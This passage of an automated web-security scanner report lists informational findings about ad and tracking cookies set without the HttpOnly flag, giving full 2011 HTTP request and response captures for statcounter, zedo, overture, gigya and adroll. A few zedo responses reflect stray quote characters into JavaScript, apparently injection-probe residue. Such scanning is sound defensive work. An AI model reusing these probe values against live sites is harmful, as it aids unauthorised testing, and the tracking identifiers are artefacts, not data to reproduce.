The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

5.22. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



5.23. http://cm.npc-morris.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:49:02 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

